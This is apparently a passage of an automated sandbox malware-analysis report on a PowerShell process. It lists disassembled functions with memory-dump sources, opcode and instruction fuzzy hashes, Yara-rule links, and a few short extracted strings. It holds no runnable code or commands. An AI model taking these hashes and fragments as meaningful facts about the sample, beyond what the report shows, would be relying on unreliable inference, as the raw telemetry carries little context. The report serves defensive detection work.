                                                                                      • Opcode Fuzzy Hash: 77713a4cf522283d26b26602300740e213fdcefdb5544cd6a3d51d2e132e140c
                                                                                      • Instruction Fuzzy Hash: F0D10574A002199FDB45CF98D594E9DFBB2FF88314F288199E805AB365C731ED86CB90
                                                                                      Function 02DA9CC0 Relevance: .3, Instructions: 321COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2538181363.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_2da0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dd83e4e5a7a03a737dfaadf92dfd0440648624729d8b0d3ff6edc330e1587805
                                                                                      • Instruction ID: f25f504284127502f27d0a9263bc70c0b63267b7d7f861aaa0533df56b903280
                                                                                      • Opcode Fuzzy Hash: dd83e4e5a7a03a737dfaadf92dfd0440648624729d8b0d3ff6edc330e1587805
                                                                                      • Instruction Fuzzy Hash: DBC18031A002489FCB14DFA4D9A4E9DBBF6FF85354F154259E4069B365CB38ED89CB80
                                                                                      Function 07313988 Relevance: .3, Instructions: 275COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2f84a909c808dc852d2ddc14bfce1ce96814154db93de240797d57770ccb18fc
                                                                                      • Instruction ID: 7e89bb0193cc391f7013f9723e53d08bafef9530a292c39a1a50ae48d2f74b56
                                                                                      • Opcode Fuzzy Hash: 2f84a909c808dc852d2ddc14bfce1ce96814154db93de240797d57770ccb18fc
                                                                                      • Instruction Fuzzy Hash: 15B18DF0B402049BDB18DB68C551BAEBBF6AF89304F14C469D8096F795CB36DC45CBA2
                                                                                      Function 02DA2AA0 Relevance: .2, Instructions: 247COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2538181363.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_2da0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 50a860e3df34e84b538a2ecde66f5d684da57b3862c9e57dadb3519c6c90bb5e
                                                                                      • Instruction ID: 94667f504641235c72467da3f88785b0b54a990d7e3f9026904b44798dd7a5c7
                                                                                      • Opcode Fuzzy Hash: 50a860e3df34e84b538a2ecde66f5d684da57b3862c9e57dadb3519c6c90bb5e
                                                                                      • Instruction Fuzzy Hash: 95A18E74A006058FCB05CF59C994DBEFBB2FF88314B24866AD855AB365C731ED51CB90
                                                                                      Function 0731397F Relevance: .2, Instructions: 242COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7bd6c441e9911496be74897fe8ebb1cec5613b2cb6bd9c8d0adb1de98cd1aa67
                                                                                      • Instruction ID: e829ae4cd05013f5bc61977b6c84e8f16e7fdcf61b9a8a32ec1ca9d686f295e8
                                                                                      • Opcode Fuzzy Hash: 7bd6c441e9911496be74897fe8ebb1cec5613b2cb6bd9c8d0adb1de98cd1aa67
                                                                                      • Instruction Fuzzy Hash: C2915DF0B002059BDB18DB55C581BAEBBF2AF88304F14C469E4096F795CB76EC45CB92
                                                                                      Function 07313934 Relevance: .2, Instructions: 241COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1cdd63317ac47603abb294bfcc422ddc9cd15829c18c70db742600a0ab3f9841
                                                                                      • Instruction ID: ec715aa9c343e02396c7cd8be03ad2954ec4457ec23462a1c77fb7d05a1a215d
                                                                                      • Opcode Fuzzy Hash: 1cdd63317ac47603abb294bfcc422ddc9cd15829c18c70db742600a0ab3f9841
                                                                                      • Instruction Fuzzy Hash: 60916CF0B00201EBEB18DB55C591BAEBBB2AF84304F14C469E4096F795CB36EC45CB92
                                                                                      Function 0731D3E8 Relevance: .2, Instructions: 236COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e6082f41e50a860482e1a236024e8a26e0ef7bf49b6c45556ae53dcacfdb9c9b
                                                                                      • Instruction ID: 2501d087ed44af60d0618fed59ec7ff2904c187d540d80e657bd6e28d9e03a77
                                                                                      • Opcode Fuzzy Hash: e6082f41e50a860482e1a236024e8a26e0ef7bf49b6c45556ae53dcacfdb9c9b
                                                                                      • Instruction Fuzzy Hash: 37916DB4B202049FD718CB58C550AAEBBF2EF8A314F14C469D809AF355CB36DC41CBA1
                                                                                      Function 0731D3DF Relevance: .2, Instructions: 205COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f68a08b1aee932ad80eb59db39bf43fc454b22e190af1c22e4594f74eaf51120
                                                                                      • Instruction ID: f3b3d0b8c81aa6fee73ae319bfdccae585dfe068ea9eb1d8dfda434263d911e7
                                                                                      • Opcode Fuzzy Hash: f68a08b1aee932ad80eb59db39bf43fc454b22e190af1c22e4594f74eaf51120
                                                                                      • Instruction Fuzzy Hash: AF812CB4B20205DFDB18CF54C550AAABBF2EF8A314F15C569D809AB755CB32E841CB61
                                                                                      Function 02DA9520 Relevance: .2, Instructions: 201COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2538181363.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_2da0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 375d8366327f5f3af145114dd7cbf590e582bb18e27b8248b0767ca3839dc56e
                                                                                      • Instruction ID: 8f55c9395e4b633b8d19e4257582c0d30686db57c16196f90d23a2533dbb9d22
                                                                                      • Opcode Fuzzy Hash: 375d8366327f5f3af145114dd7cbf590e582bb18e27b8248b0767ca3839dc56e
                                                                                      • Instruction Fuzzy Hash: F271AD34A012449FCB15DFA8C4A4DAEBBF2BF89254F1884A9E4459B362D735EC85CB10
                                                                                      Function 02DAA488 Relevance: .2, Instructions: 196COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2538181363.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_2da0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5ee954dcc644444b86f7911b2e555aee1bf8982ae8a317f0fefdbac1c4bd1270
                                                                                      • Instruction ID: 74e9aeb275f5f8f73bd70e46bead5b424926aa011f126e1a156f51f2ac555404
                                                                                      • Opcode Fuzzy Hash: 5ee954dcc644444b86f7911b2e555aee1bf8982ae8a317f0fefdbac1c4bd1270
                                                                                      • Instruction Fuzzy Hash: 1F719C31A002498FCB14DFA8C894A9EBBF6FF85314F14862AD415DB7A1DB75EC46CB90
                                                                                      Function 02DAA5F6 Relevance: .2, Instructions: 188COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2538181363.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_2da0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5e35b189ecd63089913989b6e0a2ddd258e1b84a75f17fff4d32b606e4fb5dfa
                                                                                      • Instruction ID: 5c0f63a523ec9db13a73782a799c7a1498d6f76da6bf21d1f2aa11a74acdb77f
                                                                                      • Opcode Fuzzy Hash: 5e35b189ecd63089913989b6e0a2ddd258e1b84a75f17fff4d32b606e4fb5dfa
                                                                                      • Instruction Fuzzy Hash: 3E714D30A002489FDB15DFB4D594BAEBBF6BF88304F148529E412AB7A0DB75ED46CB50
                                                                                      Function 02DABB87 Relevance: .1, Instructions: 124COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2538181363.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_2da0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6f30c8b8e60af36106e3ce70e97260f3fea71ddcd4dc3f5c1505dfe3c361da7b
                                                                                      • Instruction ID: 81616bc56ee9022d9b6d398b932754f845e0c8fc98d172e73db98d4cdcdbb15c
                                                                                      • Opcode Fuzzy Hash: 6f30c8b8e60af36106e3ce70e97260f3fea71ddcd4dc3f5c1505dfe3c361da7b
                                                                                      • Instruction Fuzzy Hash: 7C411835A01248AFCB04CF98E494E9DFBB1FF99324F14815AE845AB356C731ED82CB90
                                                                                      Function 0731F2EC Relevance: .1, Instructions: 122COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f0023c7c21ae6e101d7d5972c062f070d3da81fc1b8da364d379927d2eab5429
                                                                                      • Instruction ID: dd925df6457c2751a2cca3437e8c165bafb262c820eb6e904d4ae1a7981f4d76
                                                                                      • Opcode Fuzzy Hash: f0023c7c21ae6e101d7d5972c062f070d3da81fc1b8da364d379927d2eab5429
                                                                                      • Instruction Fuzzy Hash: 86412AF0B02313DFEB188E688541B7A7BB6AF90214F0588B6D90DCF655DB36C841C7A2
                                                                                      Function 02DAA219 Relevance: .1, Instructions: 121COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2538181363.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_2da0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d127edce08dec5e023d1a2bed51f685c79362a51256b49c8dc404f6606e08862
                                                                                      • Instruction ID: 7a231fa4448c9fa7af5b0168a094a877595ee1aec836a39c1af4581c85be9888
                                                                                      • Opcode Fuzzy Hash: d127edce08dec5e023d1a2bed51f685c79362a51256b49c8dc404f6606e08862
                                                                                      • Instruction Fuzzy Hash: E5419231600244DFDB14DFA4D998EAE7BF2EF89350F184569E806EB7A0CB759C82CB50
                                                                                      Function 02DAA473 Relevance: .1, Instructions: 119COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2538181363.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_2da0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7d3319cc611330f7ab3a1441c27070058f2288f49706058044fe321a03d6f01a
                                                                                      • Instruction ID: cbc83c522ac59c75105c5bafc26200b93f1e0678f0d09e143fdf9c19632c3c7b
                                                                                      • Opcode Fuzzy Hash: 7d3319cc611330f7ab3a1441c27070058f2288f49706058044fe321a03d6f01a
                                                                                      • Instruction Fuzzy Hash: 60419031A00248CFDB18DFA4D894BAEBBF2BF85344F148529D006AB7A4DBB59C85CF40
                                                                                      Function 02DA4187 Relevance: .1, Instructions: 117COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2538181363.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_2da0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6448b3c339d20ff4442d2ec8842992b76ce66da153c7e52c327816d1f78976c0
                                                                                      • Instruction ID: 44896ec1101bb52319fbd4d275c557ec2a2ae1aa726817b623c0240d31711caf
                                                                                      • Opcode Fuzzy Hash: 6448b3c339d20ff4442d2ec8842992b76ce66da153c7e52c327816d1f78976c0
                                                                                      • Instruction Fuzzy Hash: 2A51F774A00209AFDB05CFA8D594A9DFBB6FF88314F248558E805AB365C775ED82CB90
                                                                                      Function 0731524E Relevance: .1, Instructions: 102COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: af5fa19f6155e064040fdd995e4a33154e0fbf386eafa241f9e7441b7b43d0cf
                                                                                      • Instruction ID: 1815dfb0dada00ec8f70a00fef53510d1b53cee16bbc7ced3fb7d0c0069e7841
                                                                                      • Opcode Fuzzy Hash: af5fa19f6155e064040fdd995e4a33154e0fbf386eafa241f9e7441b7b43d0cf
                                                                                      • Instruction Fuzzy Hash: 6C3195B0740204AFDB149764CA51BAF7AA3EFC5304F55C424E9056F795CFB69C418BE2
                                                                                      Function 02DADC20 Relevance: .1, Instructions: 92COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2538181363.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_2da0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 28d34e76b6898d3b83dbdcc04003b79c71693c8dd4c3d1182ec94dcb69b08c7c
                                                                                      • Instruction ID: 1164987f1f244492a67868f9bf7ba955085c7310656a8b0120ce2a413dcef02a
                                                                                      • Opcode Fuzzy Hash: 28d34e76b6898d3b83dbdcc04003b79c71693c8dd4c3d1182ec94dcb69b08c7c
                                                                                      • Instruction Fuzzy Hash: B1313D30A051188FCB26DB64C955BEEB7F6BF4A309F1044E9D40AAB351CB759E81CF81
                                                                                      Function 02DA3E71 Relevance: .1, Instructions: 83COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2538181363.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_2da0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 531368cfd223575f1eeb91346725b8be40f30875c5447847eeed5a0cc5aed0a0
                                                                                      • Instruction ID: 09e8cd1b5e1ff0205aefc2918e7c22822c24a491313a323af3939c3e70bc4b41
                                                                                      • Opcode Fuzzy Hash: 531368cfd223575f1eeb91346725b8be40f30875c5447847eeed5a0cc5aed0a0
                                                                                      • Instruction Fuzzy Hash: 86313A74A00205DFCB54CF98C590AAEFBB2FF48310B258299E419AB795C331ED91CB90
                                                                                      Function 02DA3A6C Relevance: .1, Instructions: 81COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2538181363.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_2da0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8dabe08e4fe9e0acdaa8fdcb8de4fb318da8cbbd5b346c844174b256e283973e
                                                                                      • Instruction ID: 587c0dabccf270d5d943f699e900aa027135878b75b38762daa965cb3ce80e9c
                                                                                      • Opcode Fuzzy Hash: 8dabe08e4fe9e0acdaa8fdcb8de4fb318da8cbbd5b346c844174b256e283973e
                                                                                      • Instruction Fuzzy Hash: A821C174A042099FCB01CFA8D9919AAFFB1FF4A310B054196E445EB352C731ED41CBA1
                                                                                      Function 02DA324A Relevance: .1, Instructions: 79COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2538181363.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_2da0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dc656b8d77dfacc3e761d5780e0663dca3b28180ddb1e20fb59cb2c03e29510e
                                                                                      • Instruction ID: 09077905b546aaf304146ec3e6deef90571e711bd4c5c43635ecd9d6bfbb3563
                                                                                      • Opcode Fuzzy Hash: dc656b8d77dfacc3e761d5780e0663dca3b28180ddb1e20fb59cb2c03e29510e
                                                                                      • Instruction Fuzzy Hash: 76212A74A042059FCB00CF99C9909AEFBB1FF49310B25819AD849E7761C735EC51CBA0
                                                                                      Function 02DA3E80 Relevance: .1, Instructions: 76COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2538181363.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_2da0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 22cd3accdcbf1b03620707228e62d5d085b786564e2153a89d8239e0b6107577
                                                                                      • Instruction ID: ef25974f2f17a19433197aceae7974720f9dc72fe48c6ef3f612703488fa3fcc
                                                                                      • Opcode Fuzzy Hash: 22cd3accdcbf1b03620707228e62d5d085b786564e2153a89d8239e0b6107577
                                                                                      • Instruction Fuzzy Hash: E4310874A00609DFCB54CF89C590AAAF7F2FF48310B248699E919A7795C731ED91CB90
                                                                                      Function 02DA4294 Relevance: .0, Instructions: 48COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2538181363.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_2da0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 51a6434b9ac1993aab43da2ba593cc26021b43777092f76b3f38b109b7347010
                                                                                      • Instruction ID: 095ece786e85201cb05b6b9a04de44a26e6b78f526bb93c1edd25d9f6bef58b1
                                                                                      • Opcode Fuzzy Hash: 51a6434b9ac1993aab43da2ba593cc26021b43777092f76b3f38b109b7347010
                                                                                      • Instruction Fuzzy Hash: 5711C634A05209EFDB05DFA8D494E9DBBB2FF88314F288558E405AB365C771ED86CB40
                                                                                      Function 00AAD01D Relevance: .0, Instructions: 45COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2537130801.0000000000AAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_aad000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: db6588c2db96c095cc0048ff9163fea004da5bfd6cb690b55f258cdb90198ba7
                                                                                      • Instruction ID: 8c552659e099e35f4ff36384a83e6a4ba1b7a3b7e5bddb4579ef81446703929c
                                                                                      • Opcode Fuzzy Hash: db6588c2db96c095cc0048ff9163fea004da5bfd6cb690b55f258cdb90198ba7
                                                                                      • Instruction Fuzzy Hash: 3A01F7710043409AE7208B25CD84B67FF98EF47720F18C429ED8B1B686C3799841C6B1
                                                                                      Function 00AAD01C Relevance: .0, Instructions: 36COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2537130801.0000000000AAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_aad000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4fc56e369c38b1b2eaffb9a089e8d40706fe73cbdc9f0c113d0b8e11ab050030
                                                                                      • Instruction ID: 28c7b2673222d61228196f8479eb009a9f337cdc9a48f6f451f40e5e3e6cedba
                                                                                      • Opcode Fuzzy Hash: 4fc56e369c38b1b2eaffb9a089e8d40706fe73cbdc9f0c113d0b8e11ab050030
                                                                                      • Instruction Fuzzy Hash: 77F0C271004344AEE7108F16CC84B66FF98EF56734F18C55AED891B686C3799840CAB1
                                                                                      Function 02DABB2F Relevance: .0, Instructions: 33COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2538181363.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_2da0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ef1967f4abcb66e41401542c6dd35396dc78380a1d6ac82fa9f8bccbcaac9ee8
                                                                                      • Instruction ID: 41dfafea8c034bcb2bd039ee6c8493995f9091a1c431201cf91531ccd9112de1
                                                                                      • Opcode Fuzzy Hash: ef1967f4abcb66e41401542c6dd35396dc78380a1d6ac82fa9f8bccbcaac9ee8
                                                                                      • Instruction Fuzzy Hash: 31F0B431A00108EFCB14CF98DC849AEF775FF88324B248669D859A7690CB36AC13CB51

                                                                                      Non-executed Functions

                                                                                      Function 07311968 Relevance: 15.5, Strings: 12, Instructions: 455COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$$jq$$jq$$jq$$jq$$jq$$jq
                                                                                      • API String ID: 0-3488220606
                                                                                      • Opcode ID: d6a908f2b93a59652cb85b443aedabe472dec4c96b2a153ca86acdbecc486aee
                                                                                      • Instruction ID: 63fc68d0cf74fc566e4de1e5edb0d087d49d0b2a3261518a9d66547410316506
                                                                                      • Opcode Fuzzy Hash: d6a908f2b93a59652cb85b443aedabe472dec4c96b2a153ca86acdbecc486aee
                                                                                      • Instruction Fuzzy Hash: 7CE12AB170424A9FEB198B78C4106FABFB6EFC2311F1484AAD649CB291DB35C945C7A1
                                                                                      Function 0731CAC8 Relevance: 11.7, Strings: 9, Instructions: 454COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$$jq$$jq$$jq
                                                                                      • API String ID: 0-1071302482
                                                                                      • Opcode ID: e54b4ba25c56af8bcd09f8935824d5c46e037d44b1055e75c01d23d825c27df0
                                                                                      • Instruction ID: 9f7885678513cba5a380e9d7b7bd488097b6f2fcae168bc2e6ed40ad42ac8fe5
                                                                                      • Opcode Fuzzy Hash: e54b4ba25c56af8bcd09f8935824d5c46e037d44b1055e75c01d23d825c27df0
                                                                                      • Instruction Fuzzy Hash: 59E107F1B842159FEB19CF68C4507AABBA6EF86210F14D0AAD809CF651DB35CC45C7B2
                                                                                      Function 0731D970 Relevance: 10.3, Strings: 8, Instructions: 298COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 84l$84l$84l$84l$tPjq$tPjq$tPjq$tPjq
                                                                                      • API String ID: 0-2201647080
                                                                                      • Opcode ID: 8fed3c64fded5ebd4b99d68ac3fd5f9ea51fdf5c802d5bdf6ea9f283825ee19d
                                                                                      • Instruction ID: 74ad05797d8e2169160cf49a437ed372082b2731a460293404ebe3b063b49ce1
                                                                                      • Opcode Fuzzy Hash: 8fed3c64fded5ebd4b99d68ac3fd5f9ea51fdf5c802d5bdf6ea9f283825ee19d
                                                                                      • Instruction Fuzzy Hash: 49B105B1B102159FD718DF688940A6ABBE6EFCA310F15C86AE8099F391CB71DC05C7E1
                                                                                      Function 0731E988 Relevance: 9.2, Strings: 7, Instructions: 482COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'jq$4'jq$tPjq$tPjq$$jq$$jq$$jq
                                                                                      • API String ID: 0-2919996211
                                                                                      • Opcode ID: 88aa6b8a340731dabc3f3fafd63605ad7f798e7895412a9cb5b080333f136dca
                                                                                      • Instruction ID: 44d8ab4c55b933a9b963b05386f086c69e4b7c19bfe4acc8b47ab0a62a6d2c30
                                                                                      • Opcode Fuzzy Hash: 88aa6b8a340731dabc3f3fafd63605ad7f798e7895412a9cb5b080333f136dca
                                                                                      • Instruction Fuzzy Hash: D8F14BB27442158FEB189B68880176ABBF5EFC5312F18C47ADC09CB651DB36CD45C7A2
                                                                                      Function 07310528 Relevance: 7.7, Strings: 6, Instructions: 186COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
